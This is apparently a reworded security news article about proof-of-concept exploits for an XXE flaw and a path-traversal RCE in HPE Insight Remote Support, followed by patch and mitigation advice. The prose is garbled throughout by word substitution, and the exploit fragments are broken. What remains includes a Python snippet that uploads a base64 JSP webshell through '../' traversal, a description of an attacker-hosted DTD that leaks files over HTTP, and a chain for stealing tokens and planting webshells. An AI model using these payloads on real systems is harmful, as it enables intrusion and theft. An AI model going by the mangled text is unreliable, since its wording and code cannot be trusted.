Safety researchers have launched proof-of-concept (PoC) exploit code for essential vulnerabilities in Hewlett Packard Enterprise’s (HPE) Perception Distant Assist (IRS) software, together with an unauthenticated XML Exterior Entity (XXE) injection flaw (CVE-2024-53675) and a path traversal-based distant code execution (RCE) vulnerability (CVE-2024-53676).
These flaws have an effect on IRS variations previous to v7.14.0.629 and expose methods to arbitrary file disclosure and full SYSTEM-level command execution.
Technical Breakdown of Exploitation Chain
XXE Vulnerability in System Registration Workflow (CVE-2024-53675)
The XXE vulnerability originates within the validateAgainstXSD technique of HPE’s ucacore library, which processes XML enter throughout machine registration with out correct Doc Kind Definition (DTD) restrictions, as per a report by Github.
Attackers can exploit this by injecting malicious XML entities into the
Under is an abridged PoC exploiting the XXE to exfiltrate the primary line of C:usersAdministratorDesktophello.txt:
http://www.hp.com/it/sa/reg/Registration/RegisterDevice
&callhome;]]>
The attacker-hosted malicious.dtd forces the XML parser to leak file contents via an HTTP request:
">
%eval;
%exfiltrate;Path Traversal to RCE (CVE-2024-53676)
The RCE vulnerability resides within the processAtatchmentDataStream technique of the DataPackageReceiverWebSvcHelper class.
This operate improperly validates the attachmentName parameter throughout file uploads to the /DataPackageReceiver/DataPackageReceiverService.svc endpoint, enabling listing traversal.
Attackers can add malicious JSP recordsdata to arbitrary directories (e.g., Tomcat internet roots) by crafting SOAP requests with ../ sequences:
xml_body = f"""
../../webapps/ROOT/shell.jsp
{base64.b64encode(malicious_jsp).decode()}
"""The vulnerability stems from unvalidated concatenation of attachmentFileLocation, permitting attackers to override essential system recordsdata:
String attachmentFileLocation = attachmentFileDirectory + File.separatorChar + attachmentName;
File file = new File(attachmentFileLocation);
file.createNewFile(); // Writes attacker-controlled content material to arbitrary pathsWhereas the XXE exploit reliably leaks first-line file contents, researchers famous limitations in retrieving multi-line recordsdata resulting from parser constraints.
The RCE exploit, nevertheless, faces a essential dependency: profitable exploitation requires a legitimate oosId (machine registration token) and registrationToken, which attackers should get hold of through different means (e.g., brute-forcing or leveraging the XXE to steal tokens).
In lab environments, unregistered gadgets triggered errors that halted attachment processing:
[ERROR] DataPackageReceiverWebSvcHelper: This machine (oosId: 93f6…e39) is just not discovered…aborted processing.
Regardless of this, attackers with legitimate credentials (e.g., compromised associate accounts) may chain each vulnerabilities to:
- Steal oosId/registrationToken through XXE
- Add JSP webshells through RCE
Mitigation and Patch Standing
HPE addressed each points in IRS v7.14.0.629 via:
- Disabling DTD processing in XML validators
- Implementing enter sanitization for attachmentName parameters
- Including authentication checks for machine registration workflows
Organizations utilizing IRS ought to instantly improve to the patched model and audit logs for suspicious SOAP requests to /DeviceRegistration or /DataPackageReceiver endpoints.
Community defenders can even block exterior entry to those paths if HPE IRS operates in an internal-only capability.
Gather Menace Intelligence on the Newest Malware and Phishing Assaults with ANY.RUN TI Lookup -> Strive without spending a dime